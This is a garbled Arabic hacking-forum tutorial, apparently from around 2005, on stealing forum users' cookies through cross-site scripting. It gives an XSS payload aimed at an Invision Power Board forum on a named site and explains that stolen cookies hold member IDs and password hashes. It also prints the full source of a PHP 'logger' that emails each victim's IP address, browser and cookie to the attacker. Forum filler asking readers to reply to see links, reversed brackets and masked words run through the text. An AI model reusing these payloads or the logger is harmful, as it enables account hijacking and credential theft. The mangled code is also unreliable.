الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
xss
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً فيعفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
كود PHP:
>Script/Script<
الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash
ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!
طيب الحين وجدت هذا الكود سوف نربطه باللوج
ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ) على حسب اللوج (
طيب الان بعد ما ربطته اصبح الرابط :
كود PHP:
>Script/Script<
طبعا انت استبدلعفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطباي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره )1(
طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال
بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board
الكود للثغره :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط'<**********alert)document.******(>/script<
احنا راح نستبدل :
كود PHP:
>Script/Script<
بـ
كود PHP:
>Script/Script<
واستبدل هنا موقع جوجل باي موقع تبغاه
ورابط اللوجعفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطباللوج تبعك
====================
تطبيق :
التطبيق هنا :
كود PHP:
http:// www.mahrum.com/forum s/index.php?act=idx='<**********alert)document.***** *( >/script<
===================
اللوج :
كود PHP:
>?php
// Thnx For Security 4 Arab -عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط-عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet="Linux_Drox@hotmail.com";
////////////////////////////////
$Ip=$REMOTE_ADDR;
$Sys=$HTTP_USER_AGENT;
//////////////////////////////////////////////
if)$ToGet==''(}echo'Edit Your Email Befor You Use Me !!'; exit)(;{
//
$Time=date)"l dS of F Y h:i:s A"(;
$Hdr='From: Logger >logger@secourty<';
$Msg='
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 ] Devil From Palestine [ -
- >devil-00@hotmail.co.uk<>devil.00@gmail.com<>devil0f0p@ya hoo.com< -
---------------------------------------------------------------------
- IP ::- ] '.$Ip.' [
- System ::- ] '.$Sys.' [
- The ****** ::- ] '.$id.' [
- Time ::- ] '.$Time.' [
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log >log.log< && -
---------------------------------------------------------------------
';
$send=mail)$ToGet,'S4a - ] New****** [',$Msg,$Hdr(;
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 ] 25/5/2005 [ >> v0.10 */
if)isset)$_GET]"re"[((}
$&@#&@#&@#&@#&@#&@#&@#=$_GET]"re"[;
if)$&@#&@#&@#&@#&@#&@#&@#==""(}
mail)$ToGet,'S4a - ]Error[','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr(;
{else}
header)"location:".$&@#&@#&@#&@#&@#&@#&@#(;
{
{
//
?<
استبدل هنا :
كود PHP:
$ToGet="Linux_Drox@hotmail.com";
الايميل:عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
بالايميل تبعك !
واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير اع التطبيق الا لانه درس عملي فقط لا أكثر ..
وبإمكانك استغلاله بثغره xss تبع cPanel
وغيرها منعفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss